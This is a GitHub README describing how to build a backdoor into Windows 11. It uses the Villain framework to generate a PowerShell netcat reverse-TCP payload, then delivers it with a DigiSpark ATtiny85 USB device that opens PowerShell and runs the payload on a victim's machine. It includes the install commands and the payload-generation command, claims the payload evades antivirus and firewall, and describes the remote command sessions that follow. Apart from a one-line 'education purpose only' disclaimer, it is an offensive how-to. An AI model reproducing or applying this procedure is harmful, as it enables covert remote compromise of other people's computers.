Skip to content

Creating Backdoor using Villain & Penetrating into Windows 11

Notifications You must be signed in to change notification settings

mishqatabid/Network-Security

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

23 Commits
 
 
 
 

Repository files navigation

Network-Security

Requirements:

• Kali Linux (attacker’s machine)
• Windows 11 (victim’s machine)
• Villain Tool on Kali Linux
• DigiSpark Attiny85
• Arduino IDE

Installing Villain Tool

Install the latest version of Villain manually:

sudo git clone https://github.com/t3l3machus/Villain.git<br>

1

Install the requirements.txt

cd ./Villain
pip3 install -r requirements.txt

2

You should also install gnome-terminal (required for one of the framework's commands):

sudo apt update&&sudo apt install gnome-terminal

3

Now it is ready to use

4

Generate & Test Payload

Generating Payload

As Villain tool is operating, we will use it to generate to generate the required payload for our backdoor.
To generate the payload, write the keyword generate, specify the type of payload you want to generate, then specify the local host and click enter to get the desired payload

generate payload=windows/netcat/powershell_reverse_tcp lhost=eth0 

5

Testing Payload

• The payload is generated and it’s time to test the payload.
• For testing we are using Windows 11
• Open the PowerShell, paste the payload on shell and click enter
• You can witness that the payload is running successfully and have bypassed the Windows Antivurus and Firewall

8

Deploying Payload

• To deploy the payload, we will download the Arduino IDE
• Open the IDE, create a new sketch file and write down the code for Digispark Attiny85.
• The Sketch is then compiled and uploaded on Arduino present in Digispark Attiny85

9

Backdoor

• Now when the victim inject the Attiny85 in its machine.
• After few seconds, search bar is opens and PowerShell is searched
• It opens the PowerShell, then automatically pastes the payload and click enter to execute it.
• Once the script is executed you can witness that a backdoor session has been established on the Villain terminal on attacker’s machine.

1

• Now by typing sessions on the Villain terminal, you can see all the possible session that has been established using the payload.
• It contains Session ID, IP Address, OS Type, User, Owner and Status.
2
3

Now the backdoor has been created, you can easily execute any command

Use this for Education Purpose ONLY

Releases

No releases published

Packages

No packages published

Languages